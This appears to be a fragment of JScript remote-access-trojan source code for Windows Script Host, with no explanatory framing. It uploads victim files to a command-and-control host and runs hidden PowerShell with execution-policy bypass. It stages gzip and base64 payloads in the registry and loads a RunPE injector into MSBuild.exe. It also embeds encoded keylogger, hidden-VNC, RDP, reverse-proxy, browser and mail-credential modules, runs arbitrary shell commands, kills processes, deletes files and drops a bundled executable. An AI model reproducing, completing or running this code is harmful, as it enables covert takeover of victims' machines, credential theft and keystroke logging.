var httpobj,objstreamuploade,buffer;
var objstreamuploade = WScript.CreateObject("adodb.stream");
objstreamuploade.Type = 1;
objstreamuploade.Open();
objstreamuploade.loadFromFile(fileurl);
buffer = objstreamuploade.Read();
objstreamuploade.close();
objstreamdownload = null;
var httpobj = WScript.CreateObject("msxml2.xmlhttp");
httpobj.open("post","http://" + host + ":" + port +"/" + retcmd, false);
httpobj.setRequestHeader("user-agent:", information());
httpobj.send(buffer);
}catch(er){
updatestatus("Upload+Failed");
function faceMask(compressed64){
var pwshl="powershell -ExecutionPolicy Bypass -windowstyle hidden -Command ";
var aRInyPRio="HKCU\\SOFTWARE\\Microsoft\\test";
shellobj.regwrite(aRInyPRio,compressed64,"REG_SZ");
shellobj.Run(pwshl+String.fromCharCode(34)+"$Cli444 = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"+String.fromCharCode(34),0,false);
return loopTill(compressed64);
function loopTill(interval){
var data = shellobj.regread("HKCU\\SOFTWARE\\Microsoft\\test");
while(data == interval){
WScript.sleep(1000);
data = shellobj.regread("HKCU\\SOFTWARE\\Microsoft\\test");
shellobj.regdelete("HKCU\\SOFTWARE\\Microsoft\\test");
return data;
function deletefaf (url){
filesystemobj.deleteFile(url);
filesystemobj.deleteFolder(url);
}catch(err){}
function cmdshell (cmd){
var httpobj,oexec,readallfromany;
var strsaveto = installdir + "out.txt";
shellobj.run("%comspec% /c " + cmd + " > \"" + strsaveto + "\"", 0, true);
readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
filesystemobj.deleteFile(strsaveto);
}catch(ee){}
return readallfromany;
function enumprocess(){
var ep = "";
var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_process",null,48);
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()){
var objitem = fi.item();
ep = ep + objitem.name + "^";
ep = ep + objitem.processId + "^";
ep = ep + objitem.executablePath + spliter;
}catch(er){}
return ep;
function exitprocess (pid){
shellobj.run("taskkill /F /T /PID " + pid,0,true);
}catch(err){}
function getParentDirectory(path){
var fo = filesystemobj.getFile(path);
return filesystemobj.getParentFolderName(fo);
function enumfaf (enumdir){
var re = "";
for(var fi = new Enumerator(filesystemobj.getFolder (enumdir).subfolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
re = re + folder.name + "^^d^" + folder.attributes + spliter;
for(var fi = new Enumerator(filesystemobj.getFolder (enumdir).files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
}catch(err){}
return re;
function getKeyLogger(){
var encoded = "H4sIAAAAAAAEAO18C3gc1ZFu9WN6HpJGmhlZlrFsDzY2YyQL+YVtsEGyJEvCkiWkkY3BII9m2tLg0bQ8M7KlmIAIIRsSZ4k3T8jjQpybhOzdAAlZSEKCA2w27OZBshvyIoQ8bgjJ7ia5IcmS7DX3r+qelySDc/Pt3e9+X9qe6lN1qurUqVOnzjndM+q75q2kEZGOz8svEz1M9tVKr37N4uNf8Wk/Pej98vkPK71fPj86nsyGJzPWWCY2EY7H0mkrFx41w5mpdDiZDnf0D4UnrITZXFXlu8DRMdBJ1KvodP2/fv1AXu9zpCoVSgXRIJAam/axIwBhp1G2jsuqbTdR8Q7hAqJS622iQHTUFHTVlPQhCr37uHA30bhvgU6eJqp0OttwDj4pXLDPU4J6gHeX4M05czqH+4NXOf0aLO1EQcXB5mwilosRvcexgftMe8v5WmFlcyabiZPTB/RFjL56Hl9rc8ZMWXGnT6cdfYl5fDvPrZN/vv5/v956xL5zbKrkoic2g3YZSU64lMjwbS7mhHO51qgRhQhBeBH/VyMuB/l61o3SLOr0rIdLPHezXi5pXPJxSedSBZdcPBmggkItisxXCAboJha3ELo+XyMZF+XrVKljhVbV3DpN6rgJyz+3Tpc6btSqnlvnkjo2w6rJ1y1t0SkEEwyuU0+gtLQpWE1n6rhk1YJtnVbXqCwO6QF920+g5CZw6rVnlLozSsgVcDVtFMJTzB5ZBHarDiBkBIymugyIk3VvWYWeRhaDmq0HeA01VlB2CTuEBWmOeK11nniXPd7oe/a1z2amwpBfvU5fU9dYt7oygoTl81jLmFWMqDujnQmsyWB4JxdLU1XeOrveWg7wAfJK2xVum5hdwTZEoNP37OK5jVvnc9vPUKOLVF+jAveQ0sDjdIJ8n6Yt75RxOUHmr2gxD1+oRSWoIzf7TjtTp7LLVrIKLUhnFjFq3MIQo85xs8qJG5YLkuRS+FyLYN3wRVbnR8SOD85lXqmPrJk7j
return faceMask(encoded);
function getConfig(){
var encoded = "W2FkbWluXQ0KRmlsZVRyYW5zZmVyRW5hYmxlZD0xDQpGVFVzZXJJbXBlcnNvbmF0aW9uPTENCkJsYW5rTW9uaXRvckVuYWJsZWQ9MQ0KQmxhbmtJbnB1dHNPbmx5PTANCkRlZmF1bHRTY2FsZT0xDQpVc2VEU01QbHVnaW49MA0KRFNNUGx1Z2luPQ0KcHJpbWFyeT0xDQpzZWNvbmRhcnk9MA0KU29ja2V0Q29ubmVjdD0xDQpIVFRQQ29ubmVjdD0xDQpBdXRvUG9ydFNlbGVjdD0wDQpQb3J0TnVtYmVyPTU5MDANCkhUVFBQb3J0TnVtYmVyPTU4MDANCklucHV0c0VuYWJsZWQ9MQ0KTG9jYWxJbnB1dHNEaXNhYmxlZD0wDQpJZGxlVGltZW91dD0wDQpFbmFibGVKYXBJbnB1dD0wDQpFbmFibGVVbmljb2RlSW5wdXQ9MA0KRW5hYmxlV2luOEhlbHBlcj0wDQpRdWVyeVNldHRpbmc9Mg0KUXVlcnlUaW1lb3V0PTEwDQpRdWVyeURpc2FibGVUaW1lPTANClF1ZXJ5QWNjZXB0PTANCkxvY2tTZXR0aW5nPTANClJlbW92ZVdhbGxwYXBlcj0wDQpSZW1vdmVFZmZlY3RzPTANClJlbW92ZUZvbnRTbW9vdGhpbmc9MA0KUmVtb3ZlQWVybz0wDQpEZWJ1Z01vZGU9MA0KQXZpbG9nPTANCnBhdGg9JXBhdGglDQpEZWJ1Z0xldmVsPTANCkFsbG93TG9vcGJhY2s9MQ0KTG9vcGJhY2tPbmx5PTANCkFsbG93U2h1dGRvd249MQ0KQWxsb3dQcm9wZXJ0aWVzPTENCkFsbG93SW5qZWN0aW9uPTANCkFsbG93RWRpdENsaWVudHM9MQ0KRmlsZVRyYW5zZmVyVGltZW91dD0zMA0KS2VlcEFsaXZlSW50ZXJ2YWw9NQ0KSWRsZUlucHV0VGltZW91dD0wDQpEaXNhYmxlVHJhe
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
function getUVNC(){
var encoded = "H4sIAAAAAAAEAO18DXQcV5Xmrar+b0lRS7Ykj+24LP9Ejn6sX9sydmxZ8o9iyzJu+SeJM3apuyRV0t3VrqqWrSQObRIOBJxswsIsGw4kgd2B8HOWZOCE38WBsDATEsIwYQiH8SbAsrCze0j2sLPhZ5397quq/pFkkgzsnrN7KKlvvXvffffed999971X1dLYjfeTQkQBfF57jejz5F476fWvIj51q75YR5+NPrP689KBZ1ZPzBi2mrfMaUvLqiktlzMddVJXrUJONXLqyHhSzZppvau2NrbWk3FoN9EBKUAPv2L+uS/3RZKluBQn6gbS5NI+PA6g4nPKs47Lsms3UflOF8uITDvfQVQvfsv30k1c+yA36XXm/sQinXyYqIZcvSvegE9KF+yLVKAR4Psq8C5HP+vg/m82ev3qruxEScSpLjutORrRBc8G7jP1V/PtRK+7LNtKkdcH9IUa8Nm0gG9nl6VnzJTXp4c9efsW8O16Y5380/X/+lUcd+8cAjIF6X0dRJ9tJZETVhKFDqnlnPBGrs/i8+zf/PLfS7g/gE8mOWc7erbrsG6bBSul26XSYV1L61aHmrVTppUxJjvUo7plG2Zue29XN/90qMOFjFOw9O05veBYWqZDPVSYzBip/frchHmrnts+uXmzNpAa2NQz2Nevd28ZXLNQWSHnGFndJyR1R64w9tDQCP+yzevlNpgcI7qWf+W2oIf8rR1GqYi6gB3hEuccO8olhUsxLgW4FOdSkCcxRFBjtyTyDBom6E5ubmLKxWLtFLrWr5NFHQs0a+fXKaKOVZh18+sCoo6VmlfNrwuKOjbDrPfrlncHqBEmhLhOvoDS8o6Gq+hyE5fMJWDrVJrapebGQCIw+DMIuROcgSWXpabLUmMwEezoE4TnmL1tKdhNJOVYYygR6miyQMw33bscPW1rBtVuAbiN2uNkL2OHcEOa13yJ+WfCu+zx9tilc5esAlpJ6zoD65vam9bVtCHRxiLmSmYVRjRdVi4n1
return faceMask(encoded);
function getRDP(){
var encoded = "H4sIAAAAAAAEAO18C3Qc5ZXmreqnuluNWzKS5QeU5UdkJLUtWX7IY4NkSbYFli0s2ebhxC51l6TC3V1NVbctkUDkMbOBA8kMh2SGmEmGRzIZFmY3D2YIE5IxA9mTZEkmmRkyIdmwkNcJm5PDJiEbMnsw+91b1S9JBJic3dk5J2X1rf/e/77++9//VdXtkev+iHxE5Mfn9deJPkvu1Udvfs3hE7/0b+L0aN1XV39W2f/V1ePTpqPlbWvK1rNaSs/lrII2YWh2MaeZOW3w4JiWtdJGsr4+stbTMTpEtF/x0zcfVt5Z0vsCqUpUiRL1AGlyac8fAtDwOeF5x2XV9ZuocqfzFUSlvj8gWiJ/lXv5Jtet0HvUa8z2xCKNvI8oRq7dlW8hJuUL/oWr0DDwfVV4smDMFHD/QbfXrp7qRpRVnEg6ab2gE93u+cBtpu21fH1oddJ27BR5bUBbqAGfHQv4+pK2kbFSXpvu8/TtX8C3+6018nfXv/fr/CH3zrmpUoB2dqK8jmROWE0U/P2OypzwVq71aptCFCG6jP/UtoCH/IMTQmkOdX4nzCUeu04dl3xcinDJz6UolwI8GKCCGjcpMl4hmKBbWNxC6kYi7RS8rFSnSh0rtOrn1/mkjk1Y8fl1fqljo9ZF8+sCUsduWEtKdSs2+akRLgS5Tr0TpRUdDRfRhSYuWUvB1ulraleaG/0Jf++PoOQWcPqXXlCaLiiNgUSgY7MQvs7sbReD3cLkFmkMJoIdTTaI+ab3r0BL25pBdZYB3ETtUXJaOCAsSPPEl1rLJboc8fbI8zc/bxchpazr9K9vam9aF2vDhBUJW6uYVZxouuC7kFhv/x5MNYup+romt966BOABqhPb0ZBLdC5lH9o0wOeb5xu3VrPt/0btAVIj7QrCQ8pK7qc7KfI3tO2PpV/uJONn1Mzd17hJJaijEMfOd6FJ5ZC1sgpfA124mNHgGYbodc6bNV7esBxPZWGJua8N60akbV2pR9z84LmsTurb1
return faceMask(encoded);
function getReverseProxy(){
var encoded = "H4sIAAAAAAAEAO17C3QcV5nmX4/u6ofUUnfbLQlbSVt+RI4elmw5lhw7kSy/FD8jyY8wZuVWd0nquNWlVHXbVkIS+YSHszgZ5zAw4CxMMJkZwhA2swsbAgw4wBmYDGHDbCY7OQQTGJiQ3Z3DJrs7hwyMs99/b1U/JBnCDHvm7DmpVv91/8f973//+9//3ltd2vfO86QRkY7vm28SfYHk1U+//prDN3LtFyP0ueCzK76g7H12xehU1knO2NaknZpOplP5vFVIjptJu5hPZvPJ7QdGktNWxuysrQ2tcnUc3EG0V9Ep8oNb3uXpfZlUJayEiXqA1EvaZ4cBkvged63jsirtJirf6VIZUan/vUKB0FFf0lVf0Yfj0LvH7cynQot08hGiGpLtLn8LPildsC9QgQaA767AOwvm6QLun1vv9qunshMlFcc7nUyqkCJ61LWB+0y91XL96HWn7dhpcvuAvgijNy+Q6++0zZyVdvv0iKtv5wK5bW+tk29f/79f54flnWNTJR/9dB3R6RYSOeEdRP6DyXJOeCvX5/D9zjM/+4qC+0P45kZmnYI53TlsOlbRTptOqTRspjKm3Z6cdtKWncuOtycPm7aTtfJb13d28ac9OVjMFYq2uTVvFgt2KteePFgcz2XTe8zZUeuEmd86vmlTamN64w3dfRt6zK7evpULGyvmC9lp0yOMmAW1wtiDA9v5j21eo7bCZEye6/lPbfW5yF85Bkpz4OlOgEucc5wglzQuhbikcynMJR9PYqigeJci8gwqRukerm5hyoVCbeS/3uOpgscKrdr5PE3wuAkrMp+nCx43atXN5/kEj82w6j3esi6d4jDBzzz1HErL2mN1dCXBJWsJxDq0RJvSENejet/fQck9kNSXXFESV5S4L+pr3yAIz7F461KIWwmAuD/qb0/YIM4kHliGnrY2gOo0AtxJbWFymtghXJHmVV9ivUN4lz3eFrp892W7iFrK6g59TaItsbqmFYk2FLCaWVQYkbiiX
return faceMask(encoded);
function getHbrowser(){
var encoded = "H4sIAAAAAAAEAO19C3QcV5Fo9b9nJI3UM7Yk25I9/mZsfSz5E0tOnEiWZFtYtmVL/iVO7NFMW554ND3pGdlWvvISIAETSAiwMQSSkN1HdrMQWHiOQ1icwFlIFthkH7CEBRPI55FNCPCWvOVrv6q63TOjj0Pylrd73jmMPNW36tatW7du3bp1e3rGW654PygAoOL7/HmAR0C8OuAPv8bxHZr3aAg+F/jG/Eekvm/MHzyUykWzrjPsxkeiiXgm4+SjQ3bUHc1EU5lo97aB6IiTtJsrKoKLPBn9PQB9kgqX3XX+al/ucyBLZVIZwC5EqgTtplEEUa9T0o7KstAboHjFxgVEho53sACWUVWQVVUyhhjKHaDCvQCHgtMM8gxAuTfYujdhk8IL9TNLUBPxTSV4c94+lsfrLTu9ce0qHURBxIHmXDKejwPc7+lAY4YrJvJ1oJbNbs5NgDcGHAsrvW8KX0eza6edhDemM568Q1P41r+5Qf7p9f/768CouJJvyqDBdy/BNdkOHBPaAPT+aDEmvJnX5/D9zad+9ncSXu/Ad3pgLJe3R5p32Dln1E3YuUJphx1P2m5jdCSXcNx0aqgxust2cykns25Vcwv9NUa7RtP5Uddel7FH82483RjtHx1KpxKb7bFB57CdWTe0Zk18dWL1xa3tK1fZLW3tC6d2NprJp0ZsnzBg5+USZfs7u+kf6bxEjqHKuHiW0T85pnnIP+UMLI1jnZozqUQxJxegkkKlIJVUKpVRSaNFjCIg0iJxnMGGFtxEzR1ccsFgA+jL/DqZ60igUzG5TuE66sIJTa5TuY46dSon12lcR2o4VX7dnBYVIqiCTnXyCSzNaQxXwrlqKjkzkK1JqW6QaiKqpba/hEJuQk51xjmp+pwU0SytcSUTnib22Exkd6oRRHRLb6x2kZitfu8CHGmsBqm5WgTXQUMZ5GaRQaghTGo+w5nN1iWLNwTP3njWHZ2H7Rc3qUuqG6oXl8cw0AZNp55YWYnqc8o5a
return \u0066\u0061\u0063\u0065\u004d\u0061\u0073\u006b(encoded);
function getMailRec(){
var encoded = "UEsDBBQAAAAIAARW2kiB67aXNtUAAACQAQAIAAAAY21kYy5leGXsvX98U1WWAP6SvLYPCCRoq0UqVInKCDqFoLamYCpNW0eqqYGEWtoyO8pkMu4MQoI4tqU1Te3jEnV3ddcZf686447Oyswo1FEhpUxSxFFgHKiCUhT1QqoWqRCk9H3POfclLbrufj7ff77/fPtp8u4799e5955z7jnn/kj1rQ9KJkmSZPhomiR1SeLPKf3ffxw+k6b/ZZL08ri/XdRlWPS3ixb7f7a6cOWqX/501Y//ufAnP/7FL34ZLPyn2wtXhX5R+LNfFJbf7Cn851/edvuVEyeOt+ll5FmHX62581+Ppj//2vLO0YXwfOGWPUdvgSe75f6jt1Lcvx2tW4lwRvA1m/uPrqHnF0fd9DxKz1t+9hM/lvNtXN0uSVpkkKV9z/7Sl4b1SybDBIMiSecZJGmNgF1wEYStECiCJ/YCho2if/Av/ZRiBnq52GzEaIkSWsc+Mw/6m+01SAcw8KBB2n6l9L1/MbtBKvj+6O/+AZ6PmL4/+srg7WuD8CzP1dt1nmFMI8RfoSQtv3LVbT8O/liS/r1YEm2/Fp4XGM5K54T/K0UyKTgVvlZCvBmei7+TLnblqtWrfgJhaiu0WSqC5/Lvlif9/3//n/4tYQPhgVJfwBAY7x+wl0lR13YerpGk8HYzBN1aXlVRmcTm75pTJgUkd6DIPwDEpq2R1Q4gfEnb1zq/M1wG5JAbkLRNCIIkX4gk2r7GHT1QPnMpbQMKDP0VVvjyeH3sPUv7KxCssrTfDY8wv8zSfi7G9wJClvb18F1VZYlUQGnMZWVXPQ+VWzanRNWr5W5uVZtTqmtY26uFhlWX2QdANv8xSKXtc7jMoSnR8AQozg1g/ovFklRba485j5wCkI6tpf0ovAg8V8tUDBvUQil82eeIWyI7MRqTJl/7f4XBBYGfalc9dA+85j0CQOjGh+BxJKRpWgaFn/7vKFRBdLJLVJ2uV9tb4rKGL
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
function payloadLuncher(payload64, args){
var pwshl="powershell -ExecutionPolicy Bypass -windowstyle hidden -Command ";
var mRunPeCode = faceMask("H4sIAAAAAAAEAO1afXBc1XU/973d955W8lpvV9+W7DU2sEZmkSwbG2qMbckfCpYtkGyTRIO92n2WN97dt3771ragJWKA8GHTgZRMoYWUpLglbZghA2loJikG0iQUkhIKmkwCjOkHQ4aENAPNAA12f+e+t6vVh4GQ9o+2XOmde8/HPffcc8+997zdHfjU7aQSUQDP6dNEj5JX1tMHlwk84UXfDNMjNT9Y/KjY9oPFw/szxVjBscecZC6WSubzthsbtWJOKR/L5GN9O4ZiOTttJebNCy31dQxuItomArTv1BNXlfWeJGVxragligGp82in1pGHr/et47bi2U00VdN9U4hC628kqpf/U3WlkuV+6N3Njb0YV597knX+kO0fwieVAvuMKtQAvrUKT7jWEZdNXeTPK1Y9iYqKvYliOukmif7Gt4HnTEuny4F8IuEUnRT5c9hL3uDnzJJbn3CsrJ3y5zTh60vMktv4oeb4cflfX06u82qOTYWCtOZcomwzkfiI+s5R4ugaIjqP/5V40Ef+qojADE2AFyga3OK9W6zhlsqtELcCvAXOo2iXkHsUwiZdy11sHAahUCdp55V5iuSxErtuJk+VPFZrz5vJC0geD2SHp3gKRcALMk9R42iH4tEyl6Q9vF80yY83zNSpM/1Z9FbijdU87mN4fZqqx4qBXiPpxzC5BQ2nRK2+PMR+6wx1Gp1BUkKdosquEMuqETrViPku0K5jWPZvi+9fll0J2Vqp95o2kO0FALX6MdUbY17N8mgcXTtrPbZut8u+urRrV1mXUuxA9QcswWMs6FLpT0meFyaRAxsLSnwRz8bprLRrnZ2Vdp0Wx/xCGK1WUwPsS+2czgG9QtQrxDVGhWhUiEsovhhEJweFDk7vgn0WUE91WYhenhdfwvbFcRCGXiaev5CHukK3HKV5rQidBV0B6gJlnrRbUZsD8Q7u23QMMxO1Lzd4Gny0rMjzRVlXtJEayrouASUsdTXXKWogG
var aRInyPRio="HKCU\\SOFTWARE\\Microsoft\\mPluginC";
var aRInyPRio2="HKCU\\SOFTWARE\\Microsoft\\mRunPE";
shellobj.regwrite(aRInyPRio,payload64,"REG_SZ");
shellobj.regwrite(aRInyPRio2,mRunPeCode,"REG_SZ");
shellobj.Run(pwshl+String.fromCharCode(34)+"$Cli444 = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'"+args+"'));"+String.fromCharCode(34),0,false);
function Base64Encode(byteArray){
var oNode = WScript.CreateObject("microsoft.xmldom").createElement("mkt");
oNode.dataType = "bin.base64";
oNode.nodeTypedValue = byteArray;
return oNode.text;
function getBinder(){
var encoded = "[binder]";
if(encoded != "[binder]"){
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
}else{
return null;
function runBinder(){
var strsaveto = installdir + "ibnder.exe";
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getBinder());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\"");